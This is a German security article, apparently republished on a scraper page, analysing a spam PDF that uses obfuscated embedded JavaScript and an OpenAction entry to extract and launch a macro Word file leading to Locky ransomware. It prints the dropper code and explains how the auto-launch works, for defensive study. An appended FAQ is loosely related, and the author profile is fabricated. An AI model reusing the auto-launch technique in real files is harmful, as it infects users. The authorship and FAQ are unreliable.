Analysiert: Alte Masche, neue Verpackung – Infektion durch PDFs (2024)

Inhaltsverzeichnis

In jüngster Vergangenheit berichteten verschiedene Quellen von vermehrten Angriffswellen mit präparierten PDFs als E-Mail-Anhang. Lässt sich ein Opfer unter Windows von der Mail blenden und öffnet das PDF, fängt es sich über Umwege den Erpressungstrojaner Locky oder Jaff ein. Im Grunde handelt es sich bei diesem Infektionsweg um eine altbekannte Masche in neuer "Verpackung". Ich habe die Hülle geöffnet und mir angeschaut, wie der Schädling auf Computer kommt.

Gefakte Zahlungserinnerung

Der Betreff dieser Spam-Mail-Kampagne enthält typischerweise die Begriffe "Receipt", "Payment" oder "Invoice", gefolgt von einer beliebigen Ziffernfolge. Der Dateiname greift diese Nummerierung auf, wie das von mir untersuchte Beispiel-PDF "001_9018.pdf" zeigt. Dieses Sample hat mir netterweise ein Leser geschickt.

Für die Analyse greife ich auf das nützliche Tool PDF Stream Dumper zurück, das speziell für die Analyse potentiell bösartiger PDFs entwickelt wurde. Sicherheitshalber starte ich es in einer VM. Eine schnelle Analyse fördert eingebettetes JavaScript zutage. Auf den ersten Blick wirkt der Code ziemlich umfangreich. Doch insgesamt werden nur zwei Funktionen ausgeführt, um die Malware-Infektion einzuleiten.

Der restliche Code dient lediglich der Tarnung und entstammt unter anderem einer Anwendung zur Verwaltung von Wetterdaten sowie einem Hacker-Skript mit dem geschmackvollen Namen "Smack my Bitch up". Der relevante Code wurde auf drei verschiedene Stellen im 200-zeiligen Skript verteilt und sieht folgendermaßen aus:

function ser2mis() {
return 'exportDataObject';
};

var absheder = ser2mis();
var firgi = 2;
var WeatherCtrlFocus = this[absheder];

function stdoutS() {
WeatherCtrlFocus({
cName: "LAMIKSJZ.docm",
nLaunch: firgi
});
};

Die umständliche Schreibweise dient offensichtlich der weiteren Verschleierung. Man könnte das Ganze nämlich auf folgendes reduzieren:

exportDataObject ({ cName: "LAMIKSJZ.docm", nLaunch: 2 }) 

Die Funktion exportDataObject richtet sich an die PDF-Anwendungen Acrobat und Acrobat Reader von Adobe. Doch auch andere Reader "verstehen" diesen Befehl.

Huckepack-Malware

Bei den Funktionen halten sich die Drahtzieher der PDF-Kampagne an die Vorgaben von Adobe zum Umgang mit JavaScript in PDF-Anwendungen. Die Acrobat JavaScript Scripting Reference dokumentiert, dass der Parameter cName den Namen des zu extrahierenden Datenobjekts erhält.

In diesem Fall lautet der Name "LAMIKSJZ.docm". Dabei handelt es sich um ein Word-Dokument mit Makros. Zu "nLaunch: 2" erfahre ich aus Adobes Dokumentation, dass die extrahierte Word-Datei in einem temporären Pfad gespeichert und dann nach dem Auftauchen einer Acrobat-Sicherheitswarnung ausgeführt wird. Schließt man den Acrobat Reader, wird die temporäre Kopie der Word-Datei automatisch gelöscht.

Wer sich ein bisschen mit JavaScript auskennt, hat bestimmt bemerkt, dass die Code-Ausführung in unserem Beispiel noch den Aufruf der im Code enthaltenen Funktion stdoutS() erfordert. Um zu gucken, wo sich der Aufruf dieser Funktion versteckt, schaue ich mir mithilfe des PDF Stream Dumpers das so genannte "Catalog Dictionary" des PDFs an. Dieses beschreibt mit der Objekt-Hierarchie vereinfacht gesagt die Struktur der Datei. Hier ein relevanter Auszug:

/Type/Catalog/Pages 9 0 R/Names 13 0 R/OpenAction.

Interessant ist der Dictionary-Eintrag OpenAction. Laut Adobes Beschreibung kann man damit automatisch eine Aktion ausführen, sobald ein PDF-Dokument geöffnet wurde. Die auszuführende Aktion finde ich in Form der im PDF verankerten "Action Dictionaries". Et voilà: Dabei handelt es sich um den gesuchten Aufruf: /S/JavaScript/JS(stdoutS();)

Netter Versuch ...

Nachdem nun klar ist, wie der Trick mit dem Word-Dokument in der PDF-Datei funktioniert, führe ich sie der Vollständigkeit halber noch einmal im Adobe Reader aus. Wie erwartet, wird das Word-Dokument erst nach dem Abnicken des Sicherheitshinweises in einen AppData-Unterordner des Windows-Nutzers extrahiert und geöffnet. Im PDF steht noch zusätzlich der Satz "Please open attached LAMIKSJZ.docm file", was so manchem Empfänger sicherlich schon aufgrund des Dateinamens und der Grammatik seltsam vorkommt.

Im Word-Dokument läuft dann alles wie bei Makro-Viren gewohnt ab: Zum Aktivieren des enthaltenen VBA-Codes muss ein Opfer erst die "Geschützte Ansicht" von Word deaktivieren. Anschließend muss es noch der Ausführung von Makros zustimmen. Erst danach erfolgt das Nachladen der Payload in Form von Locky und die anschließende Infektion.

Ich komme zu dem Schluss, dass für einen erfolgreichen Angriff mittels PDF-.docm-Kombi geschicktes Social Engineering vonnöten wäre. Meiner Beispiel-Malware fehlt diese Überzeugungskraft eindeutig. Im Grunde stellen sich die Drahtzieher mit dem Warnhinweis im Acrobat Reader selbst ein Bein, und diese zusätzliche Hürde könnte ein Opfer vor einer Infektion bewahren.

Aus Sicherheitsgründen sollte man nicht jedes per Mail erhaltene PDF blind öffnen: Aufgrund der generellen Möglichkeit, ausführbaren Code in PDFs zu packen, ist auch Vorsicht bei diesem Dateiformat geboten – und zwar völlig unabhängig davon, welche Anwendung man zum Öffnen verwendet.

Mehr Infos

Analysiert - die Serie auf heise Security

Im Rahmen der losen heise-Security-Serie "Analysiert:" werfen Experten einen Blick hinter die Kulissen von aktuellen Schädlingen, Betrugsmaschen oder anderen Tricks, die Sie um Ihre Daten bringen sollen.

(ovw)

Analysiert: Alte Masche, neue Verpackung – Infektion durch PDFs (2024)

FAQs

Analysiert: Alte Masche, neue Verpackung – Infektion durch PDFs? ›

Analysiert: Alte Masche, neue VerpackungInfektion durch PDFs. Manipulierte Word-Dokumente sind bei Kriminellen beliebt, um Computer mit Malware zu infizieren. Dass auch PDF-Dateien ausführbaren Code enthalten können, ist hingegen ein wenig in Vergessenheit geraten.

Kann eine PDF Schadsoftware enthalten? ›

PDF-Dateien gehören zu den sicheren Dateiformaten, können allerdings auch Malware enthalten und diese so in deinen Computer einschleusen. Bevor du eine angehängte PDF-Datei öffnest, solltest du zunächst prüfen, ob der *die Absender* in vertrauenswürdig scheint.

Kann man PDF gefahrlos öffnen? ›

Am sichersten ist es, wenn Sie die PDF-Datei in einem virtuellen Rechner öffnen. Den können Sie sich mit Virtual Box sowie einem Linux-System kostenlos auf den Rechner holen. Sollte die Datei verseucht sein, bleibt Ihr eigentliches System davon unberührt.

Können PDFS Makros enthalten? ›

Makro-fähige Microsoft Office-Dateien, die an eine PDF-Datei angehängt sind, können nicht geöffnet werden. Seit der Veröffentlichung von Adobe Acrobat und Acrobat Reader im August 2018 sind die folgenden Makro-fähigen Office-Dateierweiterungen aus Sicherheitsgründen dauerhaft gesperrt: MS Excel: . xlsm, .

Wie überprüft man eine Datei auf Viren? ›

Öffnen Sie eine passende Webseite, wie zum Beispiel VirusTotal, in Ihrem Browser. Über die Schaltfläche „Wählen Sie eine“ oder das freie Eingabefeld, können Sie eine Datei von Ihrer Festplatte auswählen und auf die Seite hochladen. Über den blauen „Scannen“-Button starten Sie anschließend die Überprüfung.

Kann man PDFs nachverfolgen? ›

Mit den Adobe Acrobat-Onlinediensten kannst du PDFs direkt am PC mit Kommentaren, Text und mehr bearbeiten. Zudem kannst du Kommentare und Änderungen ganz leicht über mehrere Revisionen hinweg an einem zentralen Ort nachverfolgen.

Welche Dateien sollte man nicht öffnen? ›

Alles, von Bildern bis hin zu Textdateien, kann gefährlich sein. Einer der offensichtlich gefährlichsten Dateitypen ist die ausführbare Datei. Ausführbare Dateien sind Programmieranweisungen, die ein Computer beim Öffnen der Dateien ausführt.

Wie kann ich den Schutz von PDF entfernen? ›

Wähle „Werkzeuge > Schützen > Weitere Optionen > Sicherheitseinstellungen entfernen“. Entferne den Schutz: Die Optionen hängen von der Art des Kennwortschutzes ab, den du dem Dokument zugeordnet hast. Wenn ein Kennwort zum Öffnen des Dokuments vorgegeben war, klicke auf „OK“, um es aus dem Dokument zu entfernen.

In welchen Dateien können Viren sein? ›

Auch scheinbar harmlose Dateien wie PDFs, Urlaubsbilder und Word-Dokumente können Ihren PC mit einem Virus infizieren.

Welche Anhänge niemals öffnen? ›

Welche Anhänge sind weniger sicher zu öffnen?
  • Ausführbare Dateien wie .exe und . msi: Diese können Software ausführen oder installieren, einschließlich Malware.
  • Archivdateien wie . zip und . ...
  • Dokumentdateien wie . pdf und . ...
  • Batch- oder Skriptdateien wie . bat, . ...
  • Abbilddateien wie . img, . ...
  • JavaScript-Dateien (.
Apr 29, 2024

Kann in einer ZIP Datei ein Virus sein? ›

1. ZIP- und RAR-Archive. Cyberkriminelle lieben es, Malware in Archiven zu verbergen. So wurden beispielsweise ZIP-Dateien mit dem verlockenden Namen „Love_You0891“ (die jeweilige Endziffer variierte) von Angreifern verwendet, um die Randsomware GandCrab am Vorabend des Valentinstags unter den Nutzern zu verbreiten.

Was sind aktive Inhalte in einer PDF? ›

Aktive Inhalte sind Zusatzfunktionen in einer Datei oder einem Programm, wie Makros, Add-Ins oder Datenverbindungen.

Welche Dateitypen können Schadsoftware enthalten? ›

E-Mail-Anhänge in Dateiformaten wie .exe oder . scr können Schadsoftware beinhalten, die beim Öffnen ausgeführt werden. Aber auch doppelte Dateiendungen wie z.B. "pdf.exe" sollen Nutzerinnen und Nutzer täuschen. Darüber hinaus können Schadprogramme über Office-Dokumente geladen werden.

Kann man feststellen ob eine PDF bearbeitet worden ist? ›

Wählen Sie „Bearbeiten“ > „Voreinstellungen“ > „Änderungen verfolgen“ (Windows) bzw. „InCopy“ > „Voreinstellungen“ > „Änderungen verfolgen“ (Mac OS). Wählen Sie alle Änderungsarten aus, die verfolgt werden sollen. Legen Sie für jede Änderungsart eine Textfarbe, eine Hintergrundfarbe und eine Markierungsmethode fest.

Kann man PDF-Dateien schützen? ›

Öffnen Sie Ihr PDF-Dokument zuerst in Adobe Acrobat Pro, um es mit einem Passwort sicher verschlüsseln zu können. Im Bereich Werkzeuge auf der rechten Seite wählen Sie dann den Punkt Schützen. Es erscheint eine neue Zeile oberhalb des Dokuments mit den Funktionen des Werkzeugs Schützen.

Top Articles
Latest Posts
Article information

Author: Gov. Deandrea McKenzie

Last Updated:

Views: 6448

Rating: 4.6 / 5 (66 voted)

Reviews: 89% of readers found this page helpful

Author information

Name: Gov. Deandrea McKenzie

Birthday: 2001-01-17

Address: Suite 769 2454 Marsha Coves, Debbieton, MS 95002

Phone: +813077629322

Job: Real-Estate Executive

Hobby: Archery, Metal detecting, Kitesurfing, Genealogy, Kitesurfing, Calligraphy, Roller skating

Introduction: My name is Gov. Deandrea McKenzie, I am a spotless, clean, glamorous, sparkling, adventurous, nice, brainy person who loves writing and wants to share my knowledge and understanding with you.